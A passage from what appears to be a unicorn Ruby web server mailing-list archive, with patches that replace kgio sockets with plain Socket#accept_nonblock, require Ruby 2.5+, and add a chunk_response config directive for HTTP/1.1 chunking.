-  def read(socket)
+  def read_headers(socket, ai)
     e = env
 
     # From https://www.ietf.org/rfc/rfc3875:
@@ -71,7 +71,7 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    e['REMOTE_ADDR'] = ai.unix? ? '127.0.0.1' : ai.ip_address
 
     # short circuit the common case with small GET requests first
     socket.readpartial(16384, buf)
@@ -81,7 +81,7 @@ def read(socket)
       false until add_parse(socket.readpartial(16384))
     end
 
-    check_client_connection(socket) if @@check_client_connection
+    check_client_connection(socket, ai) if @@check_client_connection
 
     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -107,8 +107,8 @@ def hijacked?
   if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+    def check_client_connection(socket, ai) # :nodoc:
+      if ai.ip?
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -152,8 +152,8 @@ def closed_state?(state) # :nodoc:
     # Ruby 2.2+ can show struct tcp_info as a string Socket::Option#inspect.
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+    def check_client_connection(socket, ai) # :nodoc:
+      if @@tcpi_inspect_ok && ai.ip?
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 2f1eb1b..ed5bbf1 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,9 +111,7 @@ def initialize(app, options = {})
 
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
-      worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
-      end
+      worker_data[1] = worker_data.slice!(1..2).map { |i| IO.for_fd(i) }
       worker_data
     end
   end
@@ -243,10 +241,6 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
-        io.autoclose = false
-        io = server_cast(io)
-      end
       logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
       LISTENERS << io
       io
@@ -594,9 +588,9 @@ def e100_response_write(client, env)
 
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
+  def process_client(client, ai)
     @request = Unicorn::HttpRequest.new
-    env = @request.read(client)
+    env = @request.read_headers(client, ai)
 
     if early_hints
       env["rack.early_hints"] = lambda do |headers|
@@ -708,10 +702,9 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
-        # but that will return false
-        if client = sock.kgio_tryaccept
-          process_client(client)
+        client_ai = sock.accept_nonblock(exception: false)
+        if client_ai != :wait_readable
+          process_client(*client_ai)
           worker.tick = time_now.to_i
         end
         break if reopen
@@ -809,7 +802,6 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
     immortal = []
 
@@ -825,8 +817,6 @@ def inherit_listeners!
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
       @immortal << io if immortal.include?(fd)
-      io.autoclose = false
-      io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
       logger.info "inherited addr=#{sock_name(io)} fd=#{io.fileno}"
       io
@@ -835,11 +825,9 @@ def inherit_listeners!
     config_listeners = config[:listeners].dup
     LISTENERS.replace(inherited)
 
-    # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
-    # objects share the same OS-level file descriptor as the higher-level
-    # *Server objects; we need to prevent Socket objects from being
-    # garbage-collected
+    # we only use generic Socket objects for aggregate Socket#accept_nonblock
+    # return value [ Socket, Addrinfo ].  This allows us to avoid having to
+    # make getpeername(2) syscalls later on to fill in env['REMOTE_ADDR']
     config_listeners -= listener_names
     if config_listeners.empty? && LISTENERS.empty?
       config_listeners << Unicorn::Const::DEFAULT_LISTEN
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 91a8e51..db9f2cb 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -65,8 +65,8 @@ def self.new(app, interval = 5, path = %r{\A/})
   end
 
   #:stopdoc:
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(*args)
+    super(*args) # Unicorn::HttpServer#process_client
     env = instance_variable_get(:@request).env
     if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index c2ba75e..06ec2b2 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,32 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
-  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
-    require 'unicorn/write_splat'
-    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
-    class UNIXSrv < Kgio::UNIXServer # :nodoc:
-      include Unicorn::WriteSplat
-      def kgio_tryaccept # :nodoc:
-        super(UNIXClient)
-      end
-    end
-    TCPClient.__send__(:include, Unicorn::WriteSplat)
-  else # Ruby 2.5+
-    UNIXSrv = Kgio::UNIXServer
-  end
-
   module SocketHelper
 
     # internal interface
@@ -105,7 +79,7 @@ def set_tcp_sockopt(sock, opt)
     def set_server_sockopt(sock, opt)
       opt = DEFAULTS.merge(opt || {})
 
-      TCPSocket === sock and set_tcp_sockopt(sock, opt)
+      set_tcp_sockopt(sock, opt) if sock.local_address.ip?
 
       rcvbuf, sndbuf = opt.values_at(:rcvbuf, :sndbuf)
       if rcvbuf || sndbuf
@@ -149,7 +123,9 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          UNIXSrv.new(address)
+          s = Socket.new(:UNIX, :STREAM)
+          s.bind(Socket.sockaddr_un(address))
+          s
         ensure
           File.umask(old_umask)
         end
@@ -177,8 +153,7 @@ def new_tcp_server(addr, port, opt)
         sock.setsockopt(:SOL_SOCKET, :SO_REUSEPORT, 1)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
-      sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      sock
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -194,10 +169,6 @@ def tcp_name(sock)
     def sock_name(sock)
       case sock
       when String then sock
-      when UNIXServer
-        Socket.unpack_sockaddr_un(sock.getsockname)
-      when TCPServer
-        tcp_name(sock)
       when Socket
         begin
           tcp_name(sock)
@@ -210,16 +181,5 @@ def sock_name(sock)
     end
 
     module_function :sock_name
-
-    # casts a given Socket to be a TCPServer or UNIXServer
-    def server_cast(sock)
-      begin
-        Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
-      rescue ArgumentError
-        UNIXSrv.for_fd(sock.fileno)
-      end
-    end
-
   end # module SocketHelper
 end # module Unicorn
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index ad5814c..4af31be 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -71,8 +71,8 @@ def soft_kill(sig) # :nodoc:
   end
 
   # this only runs when the Rack app.call is not running
-  # act like a listener
-  def kgio_tryaccept # :nodoc:
+  # act like Socket#accept_nonblock(exception: false)
+  def accept_nonblock(*_unused) # :nodoc:
     case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
@@ -82,7 +82,7 @@ def kgio_tryaccept # :nodoc:
     when nil # EOF: master died, but we are at a safe place to exit
       fake_sig(:QUIT)
     when :wait_readable # keep waiting
-      return false
+      return :wait_readable
     end while true # loop, as multiple signals may be sent
   end
 
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..224cb06 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..7f40601 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 7f22b24..53ae944 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -10,14 +10,9 @@
 
 class RequestTest < Test::Unit::TestCase
 
-  class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
-    end
-  end
+  MockRequest = Class.new(StringIO)
+
+  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
 
   def setup
     @request = HttpRequest.new
@@ -30,7 +25,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +35,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +45,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +56,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +68,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
     end
   end
 
@@ -81,7 +76,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "https", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -90,7 +85,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -99,14 +94,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
 
   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     assert_kind_of Array, @lint.call(env)
@@ -114,7 +109,7 @@ def test_rack_lint_get
 
   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -122,7 +117,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -130,7 +125,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end
 
@@ -141,7 +136,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_kind_of Array, @lint.call(env)
   end
@@ -152,14 +147,6 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
@@ -167,7 +154,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 62d5a3a..a446f06 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -24,7 +24,8 @@ def test_bind_listen_tcp
     port = unused_port @test_addr
     @tcp_listener_name = "#@test_addr:#{port}"
     @tcp_listener = bind_listen(@tcp_listener_name)
-    assert TCPServer === @tcp_listener
+    assert Socket === @tcp_listener
+    assert @tcp_listener.local_address.ip?
     assert_equal @tcp_listener_name, sock_name(@tcp_listener)
   end
 
@@ -38,10 +39,10 @@ def test_bind_listen_options
       { :backlog => 16, :rcvbuf => 4096, :sndbuf => 4096 }
     ].each do |opts|
       tcp_listener = bind_listen(tcp_listener_name, opts)
-      assert TCPServer === tcp_listener
+      assert tcp_listener.local_address.ip?
       tcp_listener.close
       unix_listener = bind_listen(unix_listener_name, opts)
-      assert UNIXServer === unix_listener
+      assert unix_listener.local_address.unix?
       unix_listener.close
     end
   end
@@ -52,11 +53,13 @@ def test_bind_listen_unix
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path)
-    assert UNIXServer === @unix_listener
+    assert Socket === @unix_listener
+    assert @unix_listener.local_address.unix?
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert File.readable?(@unix_listener_path), "not readable"
     assert File.writable?(@unix_listener_path), "not writable"
     assert_equal 0777, File.umask
+    assert_equal @unix_listener, bind_listen(@unix_listener)
   ensure
     File.umask(old_umask)
   end
@@ -67,7 +70,6 @@ def test_bind_listen_unix_umask
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path, :umask => 077)
-    assert UNIXServer === @unix_listener
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert_equal 0140700, File.stat(@unix_listener_path).mode
     assert_equal 0777, File.umask
@@ -75,28 +77,6 @@ def test_bind_listen_unix_umask
     File.umask(old_umask)
   end
 
-  def test_bind_listen_unix_idempotent
-    test_bind_listen_unix
-    a = bind_listen(@unix_listener)
-    assert_equal a.fileno, @unix_listener.fileno
-    unix_server = server_cast(@unix_listener)
-    assert UNIXServer === unix_server
-    a = bind_listen(unix_server)
-    assert_equal a.fileno, unix_server.fileno
-    assert_equal a.fileno, @unix_listener.fileno
-  end
-
-  def test_bind_listen_tcp_idempotent
-    test_bind_listen_tcp
-    a = bind_listen(@tcp_listener)
-    assert_equal a.fileno, @tcp_listener.fileno
-    tcp_server = server_cast(@tcp_listener)
-    assert TCPServer === tcp_server
-    a = bind_listen(tcp_server)
-    assert_equal a.fileno, tcp_server.fileno
-    assert_equal a.fileno, @tcp_listener.fileno
-  end
-
   def test_bind_listen_unix_rebind
     test_bind_listen_unix
     new_listener = nil
@@ -107,14 +87,18 @@ def test_bind_listen_unix_rebind
     File.unlink(@unix_listener_path)
     new_listener = bind_listen(@unix_listener_path)
 
-    assert UNIXServer === new_listener
     assert new_listener.fileno != @unix_listener.fileno
     assert_equal sock_name(new_listener), sock_name(@unix_listener)
     assert_equal @unix_listener_path, sock_name(new_listener)
     pid = fork do
-      client = server_cast(new_listener).accept
-      client.syswrite('abcde')
-      exit 0
+      begin
+        client, _ = new_listener.accept
+        client.syswrite('abcde')
+        exit 0
+      rescue => e
+        warn "#{e.message} (#{e.class})"
+        exit 1
+      end
     end
     s = unix_socket(@unix_listener_path)
     IO.select([s])
@@ -123,32 +107,6 @@ def test_bind_listen_unix_rebind
     assert status.success?
   end
 
-  def test_server_cast
-    test_bind_listen_unix
-    test_bind_listen_tcp
-    unix_listener_socket = Socket.for_fd(@unix_listener.fileno)
-    assert Socket === unix_listener_socket
-    @unix_server = server_cast(unix_listener_socket)
-    assert_equal @unix_listener.fileno, @unix_server.fileno
-    assert UNIXServer === @unix_server
-    assert_equal(@unix_server.path, @unix_listener.path,
-                 "##{@unix_server.path} != #{@unix_listener.path}")
-    assert File.socket?(@unix_server.path)
-    assert_equal @unix_listener_path, sock_name(@unix_server)
-
-    tcp_listener_socket = Socket.for_fd(@tcp_listener.fileno)
-    assert Socket === tcp_listener_socket
-    @tcp_server = server_cast(tcp_listener_socket)
-    assert_equal @tcp_listener.fileno, @tcp_server.fileno
-    assert TCPServer === @tcp_server
-    assert_equal @tcp_listener_name, sock_name(@tcp_server)
-  end
-
-  def test_sock_name
-    test_server_cast
-    sock_name(@unix_server)
-  end
-
   def test_tcp_defer_accept_default
     return unless defined?(TCP_DEFER_ACCEPT)
     port = unused_port @test_addr
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 2a14135..7986ca7 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -9,7 +9,7 @@ def setup
     @rs = "\n"
     $/ == "\n" or abort %q{test broken if \$/ != "\\n"}
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 6f5bc8a..607ce87 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -10,7 +10,7 @@ class TeeInput < Unicorn::TeeInput
 
 class TestTeeInput < Test::Unit::TestCase
   def setup
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
     @rs = "\n"
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')

[-- Attachment #4: 0003-update-dependency-to-Ruby-2.5.patch --]
[-- Type: text/x-diff, Size: 3257 bytes --]

From c67ebf96edc8ca691dfc556d4813fed242fe77ca Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 09:14:11 +0000
Subject: [RFC 3/3] update dependency to Ruby 2.5+

We actually need Ruby 2.3+ for `accept_nonblock(exception: false)';
and (AFAIK) we can't easily use a subclass of `Socket' while using
Socket#accept_nonblock to inject WriteSplat support for
`IO#write(*multi_args)'

So just depend on Ruby 2.5+ since all my Ruby is already on the
already-ancient Ruby 2.7+ anyways.
---
 HACKING                    | 2 +-
 README                     | 2 +-
 lib/unicorn/write_splat.rb | 7 -------
 t/README                   | 2 +-
 unicorn.gemspec            | 4 ++--
 5 files changed, 5 insertions(+), 12 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

diff --git a/HACKING b/HACKING
index 020209e..5aca83e 100644
--- a/HACKING
+++ b/HACKING
@@ -60,7 +60,7 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target C Ruby 2.0 and later.  We need the Ruby
+We target C Ruby 2.5 and later.  We need the Ruby
 implementation to support fork, exec, pipe, UNIX signals, access to
 integer file descriptors and ability to use unlinked files.
 
diff --git a/README b/README
index 5411003..7e29daf 100644
--- a/README
+++ b/README
@@ -12,7 +12,7 @@ both the the request and response in between unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
-* Compatible with Ruby 2.0.0 and later.
+* Compatible with Ruby 2.5 and later.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
deleted file mode 100644
index 7e6e363..0000000
--- a/lib/unicorn/write_splat.rb
+++ /dev/null
@@ -1,7 +0,0 @@
-# -*- encoding: binary -*-
-# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
-module Unicorn::WriteSplat # :nodoc:
-  def write(*arg) # :nodoc:
-    super(arg.join(''))
-  end
-end
diff --git a/t/README b/t/README
index d09c715..7bd093d 100644
--- a/t/README
+++ b/t/README
@@ -14,7 +14,7 @@ Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Ruby 2.5.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
 * {curl}[https://curl.haxx.se/]
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 85183d9..e7e3ef7 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -25,11 +25,11 @@
   s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
-  # 2.0.0 is the minimum supported version. We don't specify
+  # 2.5.0 is the minimum supported version. We don't specify
   # a maximum version to make it easier to test pre-releases,
   # but we do warn users if they install unicorn on an untested
   # version in extconf.rb
-  s.required_ruby_version = ">= 2.0.0"
+  s.required_ruby_version = ">= 2.5.0"
 
   # We do not have a hard dependency on rack, it's possible to load
   # things which respond to #call.  HTTP status lines in responses

^ permalink raw reply related	[relevance 2%]

* [PATCH] add chunk_response config directive for compatibility
@ 2023-06-20 12:28  1% EW
  0 siblings, 0 replies; 200+ results
From: EW @ 2023-06-20 12:28 UTC (permalink / raw)
  To: unicorn-public

Since Rack::Chunked is gone in Rack 3.1+ and no longer loaded by
default, we've learned to chunk HTTP/1.1 responses w/o
Content-Length to allow clients to detect truncated responses.

Unfortunately, there exist broken HTTP clients which advertise
"HTTP/1.1" in the request but cannot parse chunked responses.
Thus, we must continue to send unchunked responses as we have in
prior releases if that's what clients expect.  That is, chunked
responses are opt-in unless RACK_ENV is "deployment" or
"development".

It doesn't matter if clients are in the wrong: they've worked
this way for 14 years and we must do everything in our power to
avoid breaking existing expectations on upgrades.

I hate adding config directives, but breaking changes are even
worse since users upgrading unicorn often have no easy way to
to fix broken clients even if they're on the same LAN.
---
  Of course, if users upgrading to unicorn could fix everything;
  they wouldn't need unicorn at all :P
  unicorn was created to support broken code and now exists to
  perpetuate broken code into eternity.

 Documentation/unicorn.1      |  1 +
 lib/unicorn.rb               |  2 +
 lib/unicorn/configurator.rb  | 17 ++++++-
 lib/unicorn/http_response.rb |  2 +-
 lib/unicorn/http_server.rb   |  3 +-
 t/integration.ru             |  7 +++
 t/integration.t              | 88 +++++++++++++++++++++++++++++++++---
 7 files changed, 110 insertions(+), 10 deletions(-)

diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index b2c5e70..502f44a 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -69,6 +69,7 @@ options.
 Disables loading middleware implied by RACK_ENV.  This bypasses the
 configuration documented in the RACK ENVIRONMENT section, but still
 allows RACK_ENV to be used for application/framework\-specific purposes.
+This also affects the "chunk_response" config file directive in unicorn 7.0+
 .RS
 .RE
 .SH RACKUP COMPATIBILITY OPTIONS
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..e7b2806 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -78,7 +78,9 @@ def self.builder(ru, op)
       # middlewares will need ContentLength middleware.
       case ENV["RACK_ENV"]
       when "development"
+        server.chunk_response = true if server.chunk_response.nil?
       when "deployment"
+        server.chunk_response = true if server.chunk_response.nil?
         middleware.delete(:ShowExceptions)
         middleware.delete(:Lint)
       else
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index ecdf03e..bbc0448 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -59,6 +59,7 @@ class Unicorn::Configurator
     :check_client_connection => false,
     :rewindable_input => true,
     :client_body_buffer_size => Unicorn::Const::MAX_BODY,
+    :chunk_response => nil,
   }
   #:startdoc:
 
@@ -129,6 +130,19 @@ def [](key) # :nodoc:
     set[key]
   end
 
+  # Whether or not to chunk eligible HTTP/1.1 responses.  This is
+  # necessary for Rack 3.1+ users where the Rack::Chunked middleware
+  # no longer exists.
+  # Default: +true+ if +default_middleware+ is +true+ AND
+  # RACK_ENV is either +development+ or +deployment+.
+  # It is +false+ otherwise to support broken clients advertising
+  # HTTP/1.1 but lacking the ability to parse chunked responses.
+  # +chunk_response+ only exists since unicorn 7.0+ (the first release
+  # with Rack 3.x support).
+  def chunk_response(bool)
+    set_bool(:chunk_response, bool)
+  end
+
   # sets object to the +obj+ Logger-like object.  The new Logger-like
   # object must respond to the following methods:
   # * debug
@@ -270,7 +284,8 @@ def worker_processes(nr)
   end
 
   # sets whether to add default middleware in the development and
-  # deployment RACK_ENVs.
+  # deployment RACK_ENVs.  This also affects the +chunk_response+
+  # directive in unicorn 7.0+
   #
   # default_middleware is only available in unicorn 5.5.0+
   def default_middleware(bool)
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..c73efe9 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -68,7 +68,7 @@ def http_response_write(socket, status, headers, body,
           append_header(buf, key, value)
         end
       end
-      if !hijack && !term && req.chunkable_response?
+      if !hijack && !term && req.chunkable_response? && @chunk_response
         do_chunk = true
         buf << "Transfer-Encoding: chunked\r\n".freeze
       end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..93d7141 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -15,7 +15,7 @@ class Unicorn::HttpServer
                 :before_fork, :after_fork, :before_exec,
                 :listener_opts, :preload_app,
                 :orig_app, :config, :ready_pipe, :user,
-                :default_middleware, :early_hints
+                :default_middleware, :early_hints, :chunk_response
   attr_writer   :after_worker_exit, :after_worker_ready, :worker_exec
 
   attr_reader :pid, :logger
@@ -69,6 +69,7 @@ class Unicorn::HttpServer
   # incoming requests on the socket.
   def initialize(app, options = {})
     @app = app
+    @chunk_response = nil
     @reexec_pid = 0
     @default_middleware = true
     options = options.dup
diff --git a/t/integration.ru b/t/integration.ru
index 086126a..d8a8178 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -85,6 +85,12 @@ def rack_input_tests(env)
